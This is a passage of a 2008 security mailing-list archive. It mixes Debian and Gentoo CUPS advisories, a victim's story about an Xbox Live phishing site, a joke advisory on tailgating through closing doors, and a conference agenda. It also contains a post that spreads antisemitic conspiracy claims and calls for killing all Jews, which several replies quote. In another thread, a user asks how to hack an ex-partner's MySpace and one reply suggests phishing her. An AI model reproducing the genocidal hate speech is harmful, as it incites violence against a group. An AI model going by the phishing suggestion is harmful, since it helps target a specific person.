For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBR/HphGz0hbPcukPfAQIMhwgAlfBtUv2OIG9pd6b26OpGwV2zzXL7J23s
TCokCtRNFuzH/KhWIN/c1j8N9sZda6EwsKSQtP7VIsGFCOW0iSOMcnf5uxHnP2kl
m9+pPNn+HOBnqEU3Mj4f74rmpV/7d5yBnn20ap8IwGVjoYIqYJcPFnQrFEuNfFYY
tOaP+M74btA9eINtvx2f9HpVnjyMcM9DpVhhvU+yu52sOWvNYtLL9WqakvUI74CF
OcjpnHnLgWmcp6t++m2GpIj4YmsupWSJED6HhQDU+KphJTH89EnyFoDlj5Oyu8fL
ax+JH27yqvy1b9M0TvLpV18ewPM6fCBdy9kvLDgOrbGh0N/WqzhbfQ==
=qSYx
-----END PGP SIGNATURE-----



From lassiterxavier at yahoo.com  Tue Apr  1 00:58:12 2008
From: lassiterxavier at yahoo.com (Xavier lassiter)
Date: Mon, 31 Mar 2008 16:58:12 -0700 (PDT)
Subject: [Full-disclosure]  Xbox live accounts are being stolen (update)
Message-ID: <672631.87889.qm@web63011.mail.re1.yahoo.com>

Hi My Name Is Xavier And You said to send you any 
info on Hacked Xbox live accounts just like to tell you my account was also 
Hacked since Wednesday march 26th 2008 I been talking to Xbox for two weeks now 
its march 31st well me and two of my friends accounts got stolen by my friend 
giving me this web site for free Microsoft Points like (Excuse me for my langue) 
Like a Fucking Dumb ass I went to the web site I looks just like a Xbox web site 
here is a link www.freempz.110mb.com when you look at the website it looks so real so I put in my e-mail address and password just like Xbox.com and it signed me in nothing happened so I got of my computer and went on my Xbox and a few minutes later I get a friend request from another person it was my friend and he told me not to go to that web site because they took his information when he told me that I went to change my information it was to late the email was changed and the password so what I did was I was going to stay on but it kicked me of I did not say I singed off but I tried to sign back in it said that my account was recovered so I called Xbox im going to try to remember everything ok I called them and I told them my account was stolen they did not know what the hell I was talking about after I spent  Five minutes explaining to them that my account was stolen so they man I was talking to asked me for the gamertag Xman1231 they they asked me
 what was the address oh and this is on the first day and he asked me what was my secret password what was my pets name first I said I don?t have a pet and I told him that I put my favorite food and I told  him that everything was changed my address name last name everything they that?s when the guy got what the hell I was talking about it would been good if I wrote there names down but I did not let me get back the subject at hand ok then they put me on hold and then they put me on hold again and that?s when they put me in contact with the supervisor Matt I talked to him and everything and he said that he can suspend the account oh while this was happening they puck ass hacker was on my account but the I told they guy everything I told the man I was talking to that was they supervisor told me they will be in contact with me at the end of this week or next week in my mind I know there not going to call but they supervisor told me that I can make
 another account while I wait for there call he gave me a reference number and I got off the phone and I made a new account and I was thinking that can they just remove the email address and pass word that's there and add a new one but it was to late to call I apologize for my writing and thank you for reading this e-mail. if any question to asked you can contact me at my e-mail address  lassiterxavier at yahoo.com  





      ____________________________________________________________________________________
You rock. That's why Blockbuster's offering you one month of Blockbuster Total Access, No Cost.  
http://tc.deals.yahoo.com/tc/blockbuster/text5.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080331/f3f8d060/attachment.html 

From druid at caughq.org  Tue Apr  1 18:27:05 2008
From: druid at caughq.org (I)ruid)
Date: Tue, 01 Apr 2008 12:27:05 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door
	Race	Condition
In-Reply-To: <a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
References: <1207026022.3142.287.camel@localhost>
	<997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
	<a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
Message-ID: <1207070825.3142.293.camel@localhost>

On Tue, 2008-04-01 at 08:58 -0500, evilrabbi wrote:
> Why would you realease something like this without telling the vendor?
> What you did is irresponsible.

That is /exactly/ correct:

http://www.caughq.org/advisories/disclosure.html

-- 
I)ruid, C?ISSP
druid at caughq.org
http://druid.caughq.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/e9db127e/attachment.bin 

From Valdis.Kletnieks at vt.edu  Tue Apr  1 18:34:03 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 01 Apr 2008 13:34:03 -0400
Subject: [Full-disclosure] Xbox live accounts are being stolen (update)
In-Reply-To: Your message of "Mon, 31 Mar 2008 16:58:12 PDT."
	<672631.87889.qm@web63011.mail.re1.yahoo.com>
References: <672631.87889.qm@web63011.mail.re1.yahoo.com>
Message-ID: <6380.1207071243@turing-police.cc.vt.edu>

On Mon, 31 Mar 2008 16:58:12 PDT, Xavier lassiter said:
> info on Hacked Xbox live accounts just like to tell you my account was also 
> Hacked since Wednesday march 26th 2008 I been talking to Xbox for two weeks now

So you've been talking to them for two weeks about something that happened
less than a week ago.

Moral: If you don't even know what day of the week it is, you probably shouldn't
be using the Internet.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/c307bd58/attachment.bin 

From blah at blakogre.com  Tue Apr  1 19:13:58 2008
From: blah at blakogre.com (blah)
Date: Tue, 1 Apr 2008 11:13:58 -0700
Subject: [Full-disclosure] Xbox live accounts are being stolen (update)
In-Reply-To: <672631.87889.qm@web63011.mail.re1.yahoo.com>
References: <672631.87889.qm@web63011.mail.re1.yahoo.com>
Message-ID: <28f529ba0804011113l3720982cq90feba4b94eb1e2d@mail.gmail.com>

I'd like to introduce you to a new friend you haven't met before:

http://images.jupiterimages.com/common/detail/80/16/22421680.jpg

"march 26th 2008 I been talking to Xbox for two weeks now its march 31st "

Hacked 3/26.  Now 3/31.  2 weeks?

Here:
http://www.amazon.com/Subtraction-Flash-Cards-Pack-54/dp/0307249522/ref=pd_bbs_sr_1?ie=UTF8&s=books&qid=1207073496&sr=8-1

All of that aside, hope you get things restored.

2008/3/31 Xavier lassiter <lassiterxavier at yahoo.com>:
>
>
> Hi My Name Is Xavier And You said to send you any info on Hacked Xbox live
> accounts just like to tell you my account was also Hacked since Wednesday
> march 26th 2008 I been talking to Xbox for two weeks now its march 31st well
> me and two of my friends accounts got stolen by my friend giving me this web
> site for free Microsoft Points like (Excuse me for my langue) Like a Fucking
> Dumb ass I went to the web site I looks just like a Xbox web site here is a
> link www.freempz.110mb.com when you look at the website it looks so real so
> I put in my e-mail address and password just like Xbox.com and it signed me
> in nothing happened so I got of my computer and went on my Xbox and a few
> minutes later I get a friend request from another person it was my friend
> and he told me not to go to that web site because they took his information
> when he told me that I went to change my information it was to late the
> email was changed and the password so what I did was I was going to stay on
> but it kicked me of I did not say I singed off but I tried to sign back in
> it said that my account was recovered so I called Xbox im going to try to
> remember everything ok I called them and I told them my account was stolen
> they did not know what the hell I was talking about after I spent  Five
> minutes explaining to them that my account was stolen so they man I was
> talking to asked me for the gamertag Xman1231 they they asked me what was
> the address oh and this is on the first day and he asked me what was my
> secret password what was my pets name first I said I don't have a pet and I
> told him that I put my favorite food and I told  him that everything was
> changed my address name last name everything they that's when the guy got
> what the hell I was talking about it would been good if I wrote there names
> down but I did not let me get back the subject at hand ok then they put me
> on hold and then they put me on hold again and that's when they put me in
> contact with the supervisor Matt I talked to him and everything and he said
> that he can suspend the account oh while this was happening they puck ass
> hacker was on my account but the I told they guy everything I told the man I
> was talking to that was they supervisor told me they will be in contact with
> me at the end of this week or next week in my mind I know there not going to
> call but they supervisor told me that I can make another account while I
> wait for there call he gave me a reference number and I got off the phone
> and I made a new account and I was thinking that can they just remove the
> email address and pass word that's there and add a new one but it was to
> late to call I apologize for my writing and thank you for reading this
> e-mail. if any question to asked you can contact me at my e-mail address
> lassiterxavier at yahoo.com
>
> ________________________________
> OMG, Sweet deal for Yahoo! users/friends: Get A Month of Blockbuster Total
> Access, No Cost. W00t
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: images.jpg
Type: image/jpeg
Size: 2422 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/a2dfc991/attachment.jpg 

From rbu at gentoo.org  Tue Apr  1 20:17:06 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 1 Apr 2008 21:17:06 +0200
Subject: [Full-disclosure] [ GLSA 200804-01 ] CUPS: Multiple vulnerabilities
Message-ID: <200804012117.06507.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200804-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: CUPS: Multiple vulnerabilities
      Date: April 01, 2008
      Bugs: #211449, #212364, #214068
        ID: 200804-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in CUPS, allowing for the
remote execution of arbitrary code and a Denial of Service.

Background
==========

CUPS provides a portable printing layer for UNIX-based operating
systems.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /   Vulnerable   /                     Unaffected
    -------------------------------------------------------------------
  1  net-print/cups      < 1.2.12-r7                      >= 1.2.12-r7

Description
===========

Multiple vulnerabilities have been reported in CUPS:

* regenrecht (VeriSign iDefense) discovered that the
  cgiCompileSearch() function used in several CGI scripts in CUPS'
  administration interface does not correctly calculate boundaries when
  processing a user-provided regular expression, leading to a
  heap-based buffer overflow (CVE-2008-0047).

* Helge Blischke reported a double free() vulnerability in the
  process_browse_data() function when adding or removing remote shared
  printers (CVE-2008-0882).

* Tomas Hoger (Red Hat) reported that the gif_read_lzw() function
  uses the code_size value from GIF images without properly checking
  it, leading to a buffer overflow (CVE-2008-1373).

* An unspecified input validation error was discovered in the HP-GL/2
  filter (CVE-2008-0053).

Impact
======

A local attacker could send specially crafted network packets or print
jobs and possibly execute arbitrary code with the privileges of the
user running CUPS (usually lp), or cause a Denial of Service. The
vulnerabilities are exploitable via the network when CUPS is sharing
printers remotely.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All CUPS users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-print/cups-1.2.12-r7"

References
==========

  [ 1 ] CVE-2008-0047
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047
  [ 2 ] CVE-2008-0053
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0053
  [ 3 ] CVE-2008-0882
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0882
  [ 4 ] CVE-2008-1373
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/afb4bed8/attachment.bin 

From codyroby at hotmail.com  Tue Apr  1 20:31:38 2008
From: codyroby at hotmail.com (Cody Roby)
Date: Tue, 1 Apr 2008 15:31:38 -0400
Subject: [Full-disclosure] (no subject)
Message-ID: <BLU118-W20B1CCA9521FD8CB98190BD8F50@phx.gbl>


Alright i have a crazy ex who keeps posting malicous things about me on her myspace and i would like to know how to use html errors to hack her myspace, i saw a previous post, but the code has been removed. please help.
_________________________________________________________________
Pack up or back up?use SkyDrive to transfer files or keep extra copies. Learn how.
hthttp://www.windowslive.com/skydrive/overview.html?ocid=TXT_TAGLM_WL_Refresh_skydrive_packup_042008
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/0be6d132/attachment.html 

From mastahflank at gmail.com  Tue Apr  1 20:50:36 2008
From: mastahflank at gmail.com (=?utf-8?B?am9zaA==?=)
Date: Tue, 1 Apr 2008 19:50:36 +0000
Subject: [Full-disclosure] (no subject)
In-Reply-To: <BLU118-W20B1CCA9521FD8CB98190BD8F50@phx.gbl>
References: <BLU118-W20B1CCA9521FD8CB98190BD8F50@phx.gbl>
Message-ID: <715747295-1207079441-cardhu_decombobulator_blackberry.rim.net-472956415-@bxe032.bisx.prod.on.blackberry>

Can you sue for slander? And probably a simple phishing techique would work against her.
Sent from my BlackBerry? smartphone with SprintSpeed

-----Original Message-----
From: Cody Roby <codyroby at hotmail.com>

Date: Tue, 1 Apr 2008 15:31:38 
To:<full-disclosure at lists.grok.org.uk>
Subject: [Full-disclosure] (no subject)


Alright i have a crazy ex who keeps posting malicous things about me on her myspace and i would like to know how to use html errors to hack her myspace, i saw a previous post, but the code has been removed. please help.

----------------
Pack up or back up?use SkyDrive to transfer files or keep extra copies. Learn how. _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From groffg at gmgdesign.com  Tue Apr  1 21:05:38 2008
From: groffg at gmgdesign.com (Garrett M. Groff)
Date: Tue, 1 Apr 2008 16:05:38 -0400
Subject: [Full-disclosure] (no subject)
References: <BLU118-W20B1CCA9521FD8CB98190BD8F50@phx.gbl>
	<715747295-1207079441-cardhu_decombobulator_blackberry.rim.net-472956415-@bxe032.bisx.prod.on.blackberry>
Message-ID: <00b601c89433$c334cec0$336b880a@softpro.corp>

Another approach is that you could stop reading her blog and seek an 
alternate past-time(s). That would avoid the commission of computer crime 
and its possible ramifications.

- G



----- Original Message ----- 
From: "josh" <mastahflank at gmail.com>
To: "Cody Roby" <codyroby at hotmail.com>; 
<full-disclosure-bounces at lists.grok.org.uk>; 
<full-disclosure at lists.grok.org.uk>
Sent: Tuesday, April 01, 2008 3:50 PM
Subject: Re: [Full-disclosure] (no subject)


Can you sue for slander? And probably a simple phishing techique would work 
against her.
Sent from my BlackBerry? smartphone with SprintSpeed

-----Original Message-----
From: Cody Roby <codyroby at hotmail.com>

Date: Tue, 1 Apr 2008 15:31:38
To:<full-disclosure at lists.grok.org.uk>
Subject: [Full-disclosure] (no subject)


Alright i have a crazy ex who keeps posting malicous things about me on her 
myspace and i would like to know how to use html errors to hack her myspace, 
i saw a previous post, but the code has been removed. please help.

----------------
Pack up or back up?use SkyDrive to transfer files or keep extra copies. 
Learn how. _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From xploitable at gmail.com  Tue Apr  1 21:59:43 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 1 Apr 2008 21:59:43 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <20605.1206932416@turing-police.cc.vt.edu>
References: <mailman.702.1206122051.10081.full-disclosure@lists.grok.org.uk>
	<200803211614.11815.atlas@r4780y.com>
	<4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com>
	<b25f08e40803230344g2dc116efn7a57d19ecbc5099f@mail.gmail.com>
	<4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com>
	<20605.1206932416@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>

On Mon, Mar 31, 2008 at 4:00 AM,  <Valdis.Kletnieks at vt.edu> wrote:
> On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
>
>  > Why are they announcing podcasts when both Joel Esler and Johannes
>  > Ullrich have a privacy breach still to publically acknowledge and
>  > apologize for?
>
>  Umm.. maybe because, despite what you may think, your little pissing contest
>  with Joel and Johannes doesn't qualify as a "oh my ghod, let's drop *everything*
>  and shut down the entire workflow and not do a single damned thing until this
>  issue is resolved".

They aren't busy or getting on with business, they have obviously
snubbed the n3td3v agenda.

Joel Esler is back on duty,
http://isc.sans.org/diary.html?storyid=4225 he obviously hasn't been
sacked and he is talking about April Fools Day.

I'm mighty angry,

n3td3v



From gluttony at gmail.com  Wed Apr  2 00:21:55 2008
From: gluttony at gmail.com (Andrew A)
Date: Tue, 1 Apr 2008 16:21:55 -0700
Subject: [Full-disclosure] Greedy Jews fact of the day
Message-ID: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>

"And it shall be, when the LORD thy God shall bring thee into the land which
He swore unto thy fathers, to Abraham, to Isaac, and to Jacob, to give
thee--great and goodly cities, which thou didst not build, and houses full
of all good things, which thou didst not fill, and cisterns hewn out, which
thou didst not hew, vineyards and olive-trees, which thou didst not plant,
and thou shalt eat and be satisfied."

These verses from Deuteronomy chapter 6 are written on a piece of parchment
and placed in a box which is hung outside the house of every Jew that keeps
the covenant.

And so they have accomplished, in the United States of America. The subprime
crises and resulting bailouts (at our expense by our national reserve bank,
which is headed by an Orthodox Jew serving a board of Orthodox Jews) are
going to create thousands of empty homes and plots of arable land owned by
investment banking institutions that are owned exclusively by Orthodox Jews.

Why should we leave a single follower of such a filthy, greedy religion
alive? Do any of you have an idea?

I pray to you, the Lord my God, to help me destroy the Jewish meme. Every
single follower of this arrogant and horrible idea should have their gold
exchanged for flying pieces of lead and steel. Let the Jews take what they
have reaped and sown-- death, destruction and hatred.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/fe4e5925/attachment.html 

From groffg at gmgdesign.com  Tue Apr  1 15:44:27 2008
From: groffg at gmgdesign.com (Garrett M. Groff)
Date: Tue, 1 Apr 2008 10:44:27 -0400
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door
	RaceCondition
References: <1207026022.3142.287.camel@localhost><997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
	<a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
Message-ID: <002901c89406$e3c5e110$336b880a@softpro.corp>

Although, in all seriousness, I can imagine "physical world" things being compromised, possibly via software attacks alone (or, equally likely, a single disgruntled employee). Allow me to explain using a particular example: safes. 

Companies that make safes (be they old-fashioned mechanical or electronic) often have records of their combinations corresponding to a unique serial number for each safe. Yes, they have an electronic database of all the combinations for all their safes. In the case of electronic safes, this combination is often un-changeable; the user of the safe can use that factory default code initially to create a "user combination" that can open the safe, but can later be changed (if you wish to disallow that user access later on). Anyway, the factory default combination can't be changed and is in a database somewhere. This presents a convenience on the part of the business that produces the safes (avoids angry customers who are locked out of their safes) but reduces security for all users of that company's products.

I understand the business case for keeping records of all combinations for all safes, but the downside is security in the event that that list/database is ever leaked.

- G

  ----- Original Message ----- 
  From: evilrabbi 
  To: Nate McFeters 
  Cc: full-disclosure at lists.grok.org.uk ; bugtraq at securityfocus.com 
  Sent: Tuesday, April 01, 2008 9:58 AM
  Subject: Re: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door RaceCondition


  Why would you realease something like this without telling the vendor? What you did is irresponsible.



  On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters <nate.mcfeters at gmail.com> wrote:

    Hahaha, nice find.


    On 4/1/08, I)ruid <druid at caughq.org> wrote: 
                           ____      ____     __    __
                          /    \    /    \   |  |  |  |
             ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                        |  |      |  |__|  | |  |  |  |
                        |  |  ___ |   __   | |  |  |  |
      ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                          \____/  |__|  |__|  \______/


                         Computer Academic Underground
                             http://www.caughq.org
                               Security Advisory

      ===============/========================================================
      Advisory ID:    CAU-2008-0001
      Release Date:   04/01/2008
      Title:          Slowly Closing Door Race Condition
      Application/OS: Physical Structures
      Topic:          Physical structures employing exit doors with locks
                     are vulnerable to a race condition.
      Vendor Status:  Not Notified
      Attributes:     Physical, Race Condition
      Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
      Author/Email:   CAU <advisories (at) caughq.org>
      ===============/========================================================

      Overview
      ========

      Physical structures which employ automatically locking doors to secure
      exit points expose a race condition which may allow unauthorized entry.


      Impact
      ======

      Malicious outsiders may be able to enter a structure via an exit point.

      Exit points may additionally provide an exit from a secure area of the
      structure, allowing an outsider entering through the exit point to gain
      direct access to the secure area.


      Affected Systems
      ================

      Physical structures which employ automatically locking doors at exit
      points of the structure.


      Technical Explanation
      =====================

      An exit's lock[1] generally converts a two-way door into a one-way
      door, allowing a person to traverse the door's threshold in one
      direction but not in the other.  These types of locks are used to
      secure exit points of structures so that people may exit via the door
      but not re-enter without disabling the lock through force or
      authentication.

      When a person exits the structure through an exit point which is
      secured by such a mechanism, a race condition exists wherein a
      malicious outsider may be able to reach the door and enter through it
      before it closes and locks itself.

      Many doors, especially heavier ones, also employ closing mechanisms[2]
      which are designed to cause the door to close slowly so as not to slam
      the door shut and damage the door frame, or damage any human appendage
      which may be in between the door and it's frame.  Such closing
      mechanisms can greatly increase the amount of time that the race
      condition exists.


      Solution & Recommendations
      ==========================

      1) Always ensure that personnel exiting an exit door wait outside the
        door until it has completely closed and locked before walking
        away.

      2) Employ a double door system such as is used in an air-lock where
        the interior door must be secured prior to the exterior door being
        allowed to open.


      Exploitation
      ============

      First identify the exit point that you want to exploit.  Stand at a
      safe distance during a high-traffic time and watch for people to use
      the exit point.  Time how long it takes for the door to close and
      lock itself when someone traverses the exit point.

      Next, identify a safe hiding place near the exit point, preferably
      in a direction that would be behind a person exiting the door, but
      which is within a distance to the exit point which you could traverse
      in under the door's closing time at a brisk pace or run.

      Finally, hide in this location during a lower traffic time and wait
      for someone to utilize the exit point.  After they have exited the
      door and are walking away, run to the door and enter before it has
      closed and locked.  Extra points are awarded for a spectacular dive
      and/or roll to catch the door at the very last second.


      References
      ==========

      [1] http://en.wikipedia.org/wiki/Lock_%28device%29
      [2] http://en.wikipedia.org/wiki/Door_closer


      Credits & Gr33ts
      ================

      Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214


      --
      I)ruid, C?ISSP
      druid at caughq.org
      http://druid.caughq.org


      _______________________________________________
      Full-Disclosure - We believe in it.
      Charter: http://lists.grok.org.uk/full-disclosure-charter.html
      Hosted and sponsored by Secunia - http://secunia.com/




    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/




  -- 
  -- h0 h0 h0 --
  www.nopsled.net 


------------------------------------------------------------------------------


  _______________________________________________
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/f0328583/attachment.html 

From Valdis.Kletnieks at vt.edu  Wed Apr  2 01:06:17 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 01 Apr 2008 20:06:17 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: Your message of "Tue, 01 Apr 2008 16:21:55 PDT."
	<1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
Message-ID: <29471.1207094777@turing-police.cc.vt.edu>

On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:

> Why should we leave a single follower of such a filthy, greedy religion
> alive? Do any of you have an idea?

You're just sore because they thought of the meme "All the riches rightfully
belong to those of our religion" before your religion did...
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/42452034/attachment.bin 

From erey at ernw.de  Wed Apr  2 01:20:11 2008
From: erey at ernw.de (Enno Rey)
Date: Wed, 2 Apr 2008 02:20:11 +0200
Subject: [Full-disclosure] Troopers08 Security Conference,
	April 23/24 (Munich/Germany)
Message-ID: <20080402002011.GF2235@ws25.ernw.de>

Troopers08 Presentations
========================

Keynote on "Invulnerable Software" - Dan Bernstein

KIDS - Kernel Intrusion Detection System - Rodrigo Branco

State of Security - Andrew Cushman, Microsoft

Release of the next revision of the free Exploit-Me series of application penetration testing tools - Nish Bhalla, Security Compass

Side Channel Analysis - Job de Haas, Riscure

Hackertools according to German law (? 202c StGB) - Horst Speichert, Lawyer

Hardening Oracle in Corporate Environments - Alexander Kornbrust, Red-Database-Security

Virtualization: There is no spoon - Michael Kemp

Straight Talk about Cryptography - Jon Callas, PGP

Evilgrade: You have pending upgrades - Francisco Amato

"Self defending networks" - hype or essential need for international organisations? - Rolf Strehle, VOITH AG

Keynote "Virtualization: Floor Wax, Dessert Topping and The End of Information Security As We Know It?" - Christopher Hoff, Unisys

GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft

Incident Management - tasks and organization. - Volker Kozok, German Ministry of Defense

A penetration testing learning kit - Ariel Waissbein, Core Security

Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College

Hacking Second Life(TM) - Michael Thumann, ERNW GmbH

Enterprise Webapplication Security Strategy at Allianz S.E., Dr. Johannes Raab, Allianz S.E.

Tapping $$$ Enterprises - Pierre Kroma

Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim

SCADA and National Critical Infrastructures: is security an "optional"? - Raoul Chiesa

Data Loss Protection - Hope or Hype? - Enno Rey & Angus Blitter


--

Additional Pre-Con Latenight Talks
Packet Wars
Evening Fun

--
thanks,

Enno Rey
-- 
Enno Rey

Check out www.troopers08.org!


ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5  444E C611 033E 3296 1CC1

Handelsregister Heidelberg: HRB 7135
Geschaeftsfuehrer: Roland Fiege, Enno Rey



From tbiehn at gmail.com  Wed Apr  2 01:28:57 2008
From: tbiehn at gmail.com (T Biehn)
Date: Tue, 1 Apr 2008 20:28:57 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <29471.1207094777@turing-police.cc.vt.edu>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
	<29471.1207094777@turing-police.cc.vt.edu>
Message-ID: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>

Valdis,
Never took you for a anti-Semite.

On Tue, Apr 1, 2008 at 8:06 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
>
>  > Why should we leave a single follower of such a filthy, greedy religion
>  > alive? Do any of you have an idea?
>
>  You're just sore because they thought of the meme "All the riches rightfully
>  belong to those of our religion" before your religion did...
>
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From kurt.buff at gmail.com  Wed Apr  2 01:36:58 2008
From: kurt.buff at gmail.com (Kurt Buff)
Date: Tue, 1 Apr 2008 17:36:58 -0700
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
	<29471.1207094777@turing-police.cc.vt.edu>
	<2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
Message-ID: <a9f4a3860804011736l4f0e2d3eg4e2ff7301c8b32a0@mail.gmail.com>

And after that message, you still shouldn't. Parse it a bit more carefully...

On Tue, Apr 1, 2008 at 5:28 PM, T Biehn <tbiehn at gmail.com> wrote:
> Valdis,
>  Never took you for a anti-Semite.
>
>
>
>  On Tue, Apr 1, 2008 at 8:06 PM,  <Valdis.Kletnieks at vt.edu> wrote:
>  > On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
>  >
>  >  > Why should we leave a single follower of such a filthy, greedy religion
>  >  > alive? Do any of you have an idea?
>  >
>  >  You're just sore because they thought of the meme "All the riches rightfully
>  >  belong to those of our religion" before your religion did...
>  >
>  > _______________________________________________
>  >  Full-Disclosure - We believe in it.
>  >  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  >  Hosted and sponsored by Secunia - http://secunia.com/
>  >
>
>  _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From prb at lava.net  Wed Apr  2 01:47:07 2008
From: prb at lava.net (Peter Besenbruch)
Date: Tue, 1 Apr 2008 14:47:07 -1000
Subject: [Full-disclosure] Greedy Jews fact of the day
